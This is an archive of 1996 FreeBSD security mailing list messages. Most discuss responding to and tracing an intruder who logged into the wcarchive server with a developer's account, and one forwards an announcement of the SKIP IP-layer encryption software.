Received: (from jaeger@localhost) by dhp.com (8.7.5/8.6.12) id VAA07431; Sun, 23 Jun 1996 21:08:47 -0400 Date: Sun, 23 Jun 1996 21:08:46 -0400 (EDT) From: jaeger To: "Jordan K. Hubbard" cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <7979.835575935@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > jkh p2 a235.pu.ru Sun04PM - -bash (bash) > Sure gets the heart pounding doesn't it? > This was "me" on wcarchive.cdrom.com today - when I caught the guy I > starred myself out of the password file and `watch -W'd' him. He > wasn't doing anything special, but when I sent him a "gotcha!" he > attempted to remove my home directory (nothing in it, no loss) and > logged out. That proves this guy to not only be a cracker but a > malicious one at that and, were he to be caught and relieved of his > testicles by the russian mafia, I would be the first to ask for them > in a jar as a momento! :-) > > I'm not one to generally get too upset about this kind of thing, but > breaking into our flagship machine as me is going just a bit too far > (as was trying to nuke my files when caught - I'd have forgiven him > but for that, now I want his balls). Very amateurish, that. Contact the Russians on a secure channel (woo, sounds like a spy novel). Sweep the machine for suid shells and changed binaries. You might want to suspend some remote logins until you have this worked out. The process accounting logs, if you run that, may be illuminating. Check your history file (.bash_history in this case) and anything else he may have left around (I'm somewhat unclear on whether your home directory was actually removed). Even if you find no altered binaries or other evidence the intruder had gained root access, I'd still fire up lsof and look for sniffers or backdoor processes. Use tcp wrappers to deny access from *.ru or all but selected hosts. I'd say your chances of tracking this guy down are pretty slim unless the Russian hosts weren't root compromised or they were running enhanced logging or network monitors. Could this intrusion possibly have been a result of using cleartext remote login sessions? -jaeger From owner-freebsd-security Sun Jun 23 18:18:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA09571 for security-outgoing; Sun, 23 Jun 1996 18:18:06 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA09563; Sun, 23 Jun 1996 18:18:03 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id SAA08277; Sun, 23 Jun 1996 18:17:36 -0700 (PDT) To: Amancio Hasty cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 18:02:18 PDT." <199606240102.SAA01723@rah.star-gate.com> Date: Sun, 23 Jun 1996 18:17:35 -0700 Message-ID: <8275.835579055@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Try to use ssh so that your password and session are encrypted . This > will make further "crack" attempts a bit more difficult. Yeah, we didn't have ssh installed on this machine up to now. I'm fixing that right now. :-) Jordan From owner-freebsd-security Sun Jun 23 18:32:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA10542 for security-outgoing; Sun, 23 Jun 1996 18:32:41 -0700 (PDT) Received: from rah.star-gate.com (rah.star-gate.com [204.188.121.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA10536; Sun, 23 Jun 1996 18:32:39 -0700 (PDT) Received: from rah.star-gate.com (localhost.v-site.net [127.0.0.1]) by rah.star-gate.com (8.7.5/8.7.3) with ESMTP id SAA01869; Sun, 23 Jun 1996 18:32:29 -0700 (PDT) Message-Id: <199606240132.SAA01869@rah.star-gate.com> X-Mailer: exmh version 1.6.5 12/11/95 To: "Jordan K. Hubbard" cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 18:17:35 PDT." <8275.835579055@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 23 Jun 1996 18:32:25 -0700 From: Amancio Hasty Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Also since "you" were logged in , try to look in the logs for a a loggin session of a foreign host and I would report the incident to the FBI 8) >From The Desk Of "Jordan K. Hubbard" : > > Try to use ssh so that your password and session are encrypted . This > > will make further "crack" attempts a bit more difficult. > > Yeah, we didn't have ssh installed on this machine up to now. I'm fixing > that right now. :-) > > Jordan From owner-freebsd-security Sun Jun 23 18:37:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA10880 for security-outgoing; Sun, 23 Jun 1996 18:37:28 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA10875; Sun, 23 Jun 1996 18:37:26 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id SAA08357; Sun, 23 Jun 1996 18:37:01 -0700 (PDT) To: jaeger cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 21:08:46 EDT." Date: Sun, 23 Jun 1996 18:37:01 -0700 Message-ID: <8355.835580221@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > jkh p2 a235.pu.ru Sun04PM - -bash (bash) > > > Sure gets the heart pounding doesn't it? It doesn't give one warm fuzzy feelings, no! :-) > Contact the Russians on a secure channel (woo, sounds like a spy > novel). Sweep the machine for suid shells and changed binaries. You might Well, that's why I cc'd Andrey - he's far more "plugged in" to that whole community than I am. A break-in to wcarchive effects us all since he could have easily wiped out or compromised our FreeBSD distributions there (they're writable by me, naturally). I'm running checks now. I'm sorry to throw fear, uncertainty and doubt into everyone by noting this possibility, but it'd be remiss of me if I didn't. I'll do my best to verify the checksums (and checksum files) we have, rebuilding anything which looks suspect. David will also do a more complete security audit of this machine later on tonite. > want to suspend some remote logins until you have this worked out. I'd like to, but there are too many people running here now and I don't want to bring all work to a grinding halt over this. I'll see what I can do. > The process accounting logs, if you run that, may be illuminating. Unfortunately we don't since wcarchive has so many processes running on it that we'd need an entire 4GB disk just for the logs. :-( > Check your history file (.bash_history in this case) and anything else he > may have left around (I'm somewhat unclear on whether your home directory > was actually removed). It was and he was smart enough to wipe both the .bash_history file and the shell history (I checked before jumping on him). > Even if you find no altered binaries or other evidence the intruder > had gained root access, I'd still fire up lsof and look for sniffers or > backdoor processes. Use tcp wrappers to deny access from *.ru or all but > selected hosts. I'll do what I can - running monitoring on this machine is problematic due to the load. There are 1250 ftp users logged in right now (he WOULD pick the day after a new version of Quake was released) and the list of open files numbers literally in the thousands. :-( > I'd say your chances of tracking this guy down are pretty slim > unless the Russian hosts weren't root compromised or they were running > enhanced logging or network monitors. I'm hoping that someone at pu.ru will help us out here. I don't think that they want the reputation this is going to garner for them. > Could this intrusion possibly have been a result of using cleartext > remote login sessions? I don't think so - I have a pretty secure path to wcarchive (the T1 at WC goes straight into the same service provider's backbone that wcarchive is on). Both David and I are somewhat worried by this compromise. Jordan From owner-freebsd-security Sun Jun 23 18:40:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA11136 for security-outgoing; Sun, 23 Jun 1996 18:40:55 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA11129; Sun, 23 Jun 1996 18:40:53 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id SAA08380; Sun, 23 Jun 1996 18:40:26 -0700 (PDT) To: Amancio Hasty cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 18:32:25 PDT." <199606240132.SAA01869@rah.star-gate.com> Date: Sun, 23 Jun 1996 18:40:25 -0700 Message-ID: <8378.835580425@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Also since "you" were logged in , try to look in the logs for a > a loggin session of a foreign host and I would report the incident to the > FBI 8) All we have are the "last" logs, which show: jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) If someone at the russian site could help correlate this time (PST) to the local time at wherever a235.ru.pu came in from, we could at least narrow down which user(s) it might have been. Also, I think that calling the FBI on this one is only likely to get me put on infinite hold when they hear that the perpetrator is in Russia. :-) Jordan From owner-freebsd-security Sun Jun 23 19:01:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA12325 for security-outgoing; Sun, 23 Jun 1996 19:01:32 -0700 (PDT) Received: from rah.star-gate.com (rah.star-gate.com [204.188.121.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA12320; Sun, 23 Jun 1996 19:01:27 -0700 (PDT) Received: from rah.star-gate.com (localhost.v-site.net [127.0.0.1]) by rah.star-gate.com (8.7.5/8.7.3) with ESMTP id TAA02005; Sun, 23 Jun 1996 19:01:17 -0700 (PDT) Message-Id: <199606240201.TAA02005@rah.star-gate.com> X-Mailer: exmh version 1.6.5 12/11/95 To: "Jordan K. Hubbard" cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 18:40:25 PDT." <8378.835580425@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 23 Jun 1996 19:01:17 -0700 From: Amancio Hasty Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk I would report it nevertheless and who knows they may even have e-mail... Also, I am a bit concerned that he tried to erase your home directory because he/she probably had something in that directory. Also if you report it , it may help you in the case that the person was trying to do something really nasty. BTW: It could be a woman in that case it may be difficult to get her balls 8) Amancio >From The Desk Of "Jordan K. Hubbard" : > > Also since "you" were logged in , try to look in the logs for a > > a loggin session of a foreign host and I would report the incident to the > > FBI 8) > > All we have are the "last" logs, which show: > > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) > > If someone at the russian site could help correlate this time (PST) to > the local time at wherever a235.ru.pu came in from, we could at least > narrow down which user(s) it might have been. > > Also, I think that calling the FBI on this one is only likely to get > me put on infinite hold when they hear that the perpetrator is in > Russia. :-) > > Jordan From owner-freebsd-security Sun Jun 23 19:39:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA14922 for security-outgoing; Sun, 23 Jun 1996 19:39:22 -0700 (PDT) Received: from dhp.com (dhp.com [199.245.105.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA14895; Sun, 23 Jun 1996 19:39:10 -0700 (PDT) Received: (from jaeger@localhost) by dhp.com (8.7.5/8.6.12) id WAA09944; Sun, 23 Jun 1996 22:39:07 -0400 Date: Sun, 23 Jun 1996 22:39:07 -0400 (EDT) From: jaeger To: "Jordan K. Hubbard" cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <8378.835580425@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > All we have are the "last" logs, which show: > > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) > > If someone at the russian site could help correlate this time (PST) to > the local time at wherever a235.ru.pu came in from, we could at least > narrow down which user(s) it might have been. > This appears to be a Dialup IP connection. If the machine logging the terminal server (or other dialip access device) wasn't root compromised, we should see some useful logs. Probably a stolen account. Because of the presence of the lastlog records and the generally good security of FreeBSD, I also suspect there was no root compromise on wcarchive. I'm concerned about the possibility of a DNS server compromise, given the unusual traceroute results of the intruder's IP. On another pessimistic note, I believe most of the telco switches in Russia are still crossbars, which could make any attempt to trace the intruder through the phone system fruitless. :< > > Jordan > -jaeger From owner-freebsd-security Sun Jun 23 19:46:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA15463 for security-outgoing; Sun, 23 Jun 1996 19:46:09 -0700 (PDT) Received: from io.org (io.org [198.133.36.1]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id TAA15451 for ; Sun, 23 Jun 1996 19:46:04 -0700 (PDT) Received: from zot.io.org (root@zot.io.org [198.133.36.82]) by io.org (8.6.12/8.6.12) with ESMTP id WAA11808 for ; Sun, 23 Jun 1996 22:45:46 -0400 Received: (from taob@localhost) by zot.io.org (8.7.5/8.7.3) id WAA10817; Sun, 23 Jun 1996 22:44:46 -0400 (EDT) Date: Sun, 23 Jun 1996 22:44:46 -0400 (EDT) From: Brian Tao Message-Id: <199606240244.WAA10817@zot.io.org> To: security@FreeBSD.org Subject: SKIP IP-layer encryption release Beta 2.3 (fwd) X-Newsgroups: comp.unix.bsd.freebsd.announce In-Reply-To: <4qiq3a$3t7@bonkers.taronga.com> Organization: Internex Online Inc., Toronto, Ontario, Canada Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk ------- start of forwarded message ------- From: skrenta@incog.com (Rich Skrenta) Newsgroups: comp.unix.bsd.freebsd.announce Subject: SKIP IP-layer encryption release Beta 2.3 Date: 23 Jun 1996 02:00:58 -0500 Organization: Sun Microsystems, Internet Commerce Group Lines: 67 Sender: daemon@taronga.com Approved: peter@taronga.com Message-ID: <4qiq3a$3t7@bonkers.taronga.com> NNTP-Posting-Host: localhost.taronga.com We are pleased to announce the newest release of our domestic source reference implementation into the public domain. >From this public domain source release, you can build a fully functional IP-layer encryption and authentication package with full key management. Both FreeBSD 2.1.0 and SunOS 4.1.3 are supported in this release. DES, triple-DES and SAFER are supported for encryption and keyed-MD5 is supported for authentication. This source produces a package which contains a loadable module which works with existing TCP/IP stacks. You do not need to replace (or even recompile) your IP stack to use this package. SKIP encrypts traffic at the IP packet layer. Applications do not need to be recompiled or modified to take advantage of encryption. Source and pre-built binaries (for FreeBSD 2.1.0) may be obtained by US and Canadian citizens from http://skip.incog.com/ This software may be used without restriction, for commercial and/or non-commercial purposes. Features of this release ------------------------ o Support for FreeBSD2.1.0 o SKIP V2 compliant implementation using ESP and AH encapsulation. o Support for Authentication using keyed-MD5. o Support for DES, 3DES, and SAFER 128SK for traffic and key encryption. o Support for nomadic users o Support for multiple local identities with different sets of parameters. o Support for multiple CA (Certificate Authority) certificates. o Transport mode is supported. o New Certificate Discovery protocol. o Highly configurable key manager. o Support for RAW AH and ESP protocols. o Diffie-Hellman Public Key Agreement based system. o Support for multiple NSIDs and multiple local certificates. o GUI tool for user friendly manipulation of access control lists and key statistics. o Command line tools for manipulating access control lists, etc. o Implementation of the Certificate Discovery protocol fully integrated into SKIP. o Implementation of X.509 public key certificates. o Implementation of DSA signature algorithm for certificate signatures. o Implementation for MD2, MD5 and SHA message digest algorithms. o Implementation of ASN.1 DER encoding/decoding. o SunScreen(tm) SKIP compatibility mode. o Implementation of hashed public keys as defined in the SKIP draft. Implementation of programs to generate hashed public keys, to convert X.509 Certificates to hashed keys and print both X.509 and Hashed certificates. o High performance Big Number library for Diffie-Hellman calculations. o Implementation is effectively "public domain" and may be used both commercially and non-commercially. o Patent Agreement with Cylink allows royalty-free use of the Diffie-Hellman and other Stanford patents with this package for commercial and non-commercial use. Read README.PATENT for some restrictions. o Inclusion of prime generation program used to generate the primes in SKIP draft. ------- end of forwarded message ------- From owner-freebsd-security Sun Jun 23 20:35:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA17695 for security-outgoing; Sun, 23 Jun 1996 20:35:41 -0700 (PDT) Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA17690; Sun, 23 Jun 1996 20:35:35 -0700 (PDT) Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.7.4/8.6.12) with SMTP id XAA28034; Sun, 23 Jun 1996 23:35:28 -0400 (EDT) Message-Id: <199606240335.XAA28034@ns2.harborcom.net> Comments: Authenticated sender is From: "Bradley Dunn" Organization: Harbor Communications To: jaeger Date: Sun, 23 Jun 1996 23:30:58 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: I need help on this one - please help me track this guy Reply-to: dunn@harborcom.net CC: hackers@FreeBSD.org, security@FreeBSD.org Priority: normal X-mailer: Pegasus Mail for Win32 (v2.31) Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk The traceroute results do not indicate any DNS tampering. Traceroute looks up 127.0.0.1 using gethostbyaddr(), which then uses whatever address-to-name translation system you have running (eg /etc/hosts,NIS,DNS). I would certainly hope your translation sytem reports localhost for 127.0.0.1. :) It does indicate that there is something over there that reports its IP address as 127.0.0.1. Perhaps it is some funky terminal server hardware. Maybe it returns 127.0.0.1 when it knows that it is responsible for the particular IP being traced, but that IP isn't currently assigned? To test this, I tried tracing to some of the other hosts that would be in this pool. For example, a230.pu.ru, a231.pu.ru, etc... Some of the other ones returned this as well. So my guess would be it was a dialup dynamic IP account, and the terminal server sends the packets to its loopback interface if the IP isn't assigned. On 23 Jun 96 at 22:39, jaeger wrote: > Because of the presence of the lastlog records and the generally > good security of FreeBSD, I also suspect there was no root > compromise on wcarchive. I'm concerned about the possibility of a > DNS server compromise, given the unusual traceroute results of the > intruder's IP. Bradley Dunn From owner-freebsd-security Sun Jun 23 20:44:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA18289 for security-outgoing; Sun, 23 Jun 1996 20:44:17 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA18277; Sun, 23 Jun 1996 20:44:08 -0700 (PDT) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id NAA19897; Mon, 24 Jun 1996 13:48:41 +0930 From: Michael Smith Message-Id: <199606240418.NAA19897@genesis.atrad.adelaide.edu.au> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 13:48:40 +0930 (CST) Cc: jaeger@com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: <8355.835580221@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 06:37:01 pm MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard stands accused of saying: > > > Could this intrusion possibly have been a result of using cleartext > > remote login sessions? > > I don't think so - I have a pretty secure path to wcarchive (the T1 at > WC goes straight into the same service provider's backbone that > wcarchive is on). Both David and I are somewhat worried by this > compromise. You said you were on the road a little while back; how often do you change your passwords? > Jordan -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Sun Jun 23 20:46:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA18438 for security-outgoing; Sun, 23 Jun 1996 20:46:59 -0700 (PDT) Received: from sequent.kiae.su (sequent.kiae.su [193.125.152.6]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA18432; Sun, 23 Jun 1996 20:46:54 -0700 (PDT) Received: by sequent.kiae.su id AA26559 (5.65.kiae-2 ); Mon, 24 Jun 1996 07:40:24 +0400 Received: by sequent.KIAE.su (UUMAIL/2.0); Mon, 24 Jun 96 07:40:24 +0400 Received: (from ache@localhost) by nagual.ru (8.7.5/8.7.3) id HAA00490; Mon, 24 Jun 1996 07:35:40 +0400 (MSD) Message-Id: <199606240335.HAA00490@nagual.ru> Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 07:35:39 +0400 (MSD) Cc: hasty@rah.star-gate.com, hackers@FreeBSD.org, security@FreeBSD.org In-Reply-To: <8378.835580425@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 06:40:25 pm" From: =?KOI8-R?Q?=E1=CE=C4=D2=C5=CA_=FE=C5=D2=CE=CF=D7?= (Andrey A. Chernov) X-Class: Fast X-Mailer: ELM [version 2.4ME+ PL22 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > Also since "you" were logged in , try to look in the logs for a > > a loggin session of a foreign host and I would report the incident to the > > FBI 8) > > All we have are the "last" logs, which show: > > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) > > If someone at the russian site could help correlate this time (PST) to > the local time at wherever a235.ru.pu came in from, we could at least > narrow down which user(s) it might have been. This address is SLIP line somewhere in StPetersburg's University. Local StPetersbug time is equal to Moscow time: GMT+4 now. You can search/ask domain owner somewhere at http://www.ripn.net/nic/NICHomePage.html -- Andrey A. Chernov http://www.nagual.ru/~ache/ From owner-freebsd-security Sun Jun 23 20:47:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA18515 for security-outgoing; Sun, 23 Jun 1996 20:47:25 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA18497; Sun, 23 Jun 1996 20:47:21 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id UAA09125; Sun, 23 Jun 1996 20:46:39 -0700 (PDT) To: Michael Smith cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 13:48:40 +0930." <199606240418.NAA19897@genesis.atrad.adelaide.edu.au> Date: Sun, 23 Jun 1996 20:46:38 -0700 Message-ID: <9123.835587998@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk [jaeger@com removed from cc - he needs to fix his headers :-)] > Jordan K. Hubbard stands accused of saying: > > You said you were on the road a little while back; how often do you change > your passwords? Clearly not often enough, I guess. I've changed it everywhere and installed ssh on wcarchive. Ah well, I guess we all need one good security scare a year to keep us aware of the fact that the Internet is all one big bad neighborhood after dark now... :-) Jordan From owner-freebsd-security Sun Jun 23 20:49:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA18682 for security-outgoing; Sun, 23 Jun 1996 20:49:07 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA18672 for ; Sun, 23 Jun 1996 20:49:00 -0700 (PDT) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id NAA19939; Mon, 24 Jun 1996 13:53:27 +0930 From: Michael Smith Message-Id: <199606240423.NAA19939@genesis.atrad.adelaide.edu.au> Subject: Re: I need help on this one - please help me track this guy down! To: hasty@rah.star-gate.com (Amancio Hasty) Date: Mon, 24 Jun 1996 13:53:26 +0930 (CST) Cc: security@freebsd.org In-Reply-To: <199606240201.TAA02005@rah.star-gate.com> from "Amancio Hasty" at Jun 23, 96 07:01:17 pm MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Amancio Hasty stands accused of saying: > > I would report it nevertheless and who knows they may even have > e-mail... Also, I am a bit concerned that he tried to erase your > home directory because he/she probably had something in that directory. It's a bit late for 20-20 hindsight of course, but the first thing I usually do in that case is a recursive chmod/chown of everything in the compromised user's home directory. (usually to 'nobody'/666) > BTW: It could be a woman in that case it may be difficult to get > her balls 8) My SO just suggested one of those rotating gadgets that plumbers use for cleaning drains with. My, but she has a nasty mind. > Amancio -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Sun Jun 23 20:50:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA18806 for security-outgoing; Sun, 23 Jun 1996 20:50:51 -0700 (PDT) Received: from dhp.com (dhp.com [199.245.105.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA18780; Sun, 23 Jun 1996 20:50:32 -0700 (PDT) Received: (from jaeger@localhost) by dhp.com (8.7.5/8.6.12) id XAA14147; Sun, 23 Jun 1996 23:50:14 -0400 Date: Sun, 23 Jun 1996 23:50:09 -0400 (EDT) From: jaeger To: Bradley Dunn cc: hackers@FreeBSD.org, security@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy In-Reply-To: <199606240335.XAA28034@ns2.harborcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Bradley Dunn wrote: > The traceroute results do not indicate any DNS tampering. Traceroute > looks up 127.0.0.1 using gethostbyaddr(), which then uses whatever > address-to-name translation system you have running > (eg /etc/hosts,NIS,DNS). I would certainly hope your translation > sytem reports localhost for 127.0.0.1. :) Whoops! I think I should cut back on the caffeine...;> > > It does indicate that there is something over there that reports its > IP address as 127.0.0.1. Perhaps it is some funky terminal server > hardware. Maybe it returns 127.0.0.1 when it knows that it is > responsible for the particular IP being traced, but that IP isn't > currently assigned? > > To test this, I tried tracing to some of the other hosts that would > be in this pool. For example, a230.pu.ru, a231.pu.ru, etc... Some > of the other ones returned this as well. So my guess would be it > was a dialup dynamic IP account, and the terminal server sends > the packets to its loopback interface if the IP isn't assigned. > I've never encountered this behavior before. Does anyone know what make or model of hardware this might be? > Bradley Dunn > -jaeger From owner-freebsd-security Sun Jun 23 21:12:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA19945 for security-outgoing; Sun, 23 Jun 1996 21:12:20 -0700 (PDT) Received: from agora.rdrop.com (root@agora.rdrop.com [199.2.210.241]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id VAA19939; Sun, 23 Jun 1996 21:12:13 -0700 (PDT) Received: by agora.rdrop.com (Smail3.1.29.1 #17) id m0uY30J-0008y1C; Sun, 23 Jun 96 21:11 PDT Message-Id: From: batie@agora.rdrop.com (Alan Batie) Subject: Re: I need help on this one - please help me track this guy To: dunn@harborcom.net Date: Sun, 23 Jun 1996 21:11:59 -0700 (PDT) Cc: jaeger@com, hackers@FreeBSD.org, security@FreeBSD.org In-Reply-To: <199606240335.XAA28034@ns2.harborcom.net> from "Bradley Dunn" at Jun 23, 96 11:30:58 pm X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > To: jaeger I can't believe this is valid, so he's probably not going to get a copy of this... > It does indicate that there is something over there that reports its > IP address as 127.0.0.1. Perhaps it is some funky terminal server > hardware. 11 slip-0.pu.ru (193.124.85.1) 581.747 ms 585.953 ms 509.617 ms 12 nat.pu.ru (193.124.85.134) 579.649 ms 553.069 ms 569.455 ms 13 gw.pu.ru (193.124.85.219) 565.162 ms 566.153 ms 579.921 ms 14 * * * (localhost appeared here for Jordan) If "nat" means what I think it does (Network Address Translation; recently devised devices to translate IP addresses so private internal networks can reuse addresses in the public space), it's probably an artifact of being behind the NAT. -- Alan Batie ______ We're Starfleet officers: batie@agora.rdrop.com \ / Weird is part of the job. +1 503 452-0960 \ / --Captain Janeway DE 3C 29 17 C0 49 7A 27 \/ 40 A5 3C 37 4A DA 52 B9 It is my policy to avoid purchase of any products from companies which use unrequested email advertisements or telephone solicitation. From owner-freebsd-security Sun Jun 23 22:38:42 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA25087 for security-outgoing; Sun, 23 Jun 1996 22:38:42 -0700 (PDT) Received: 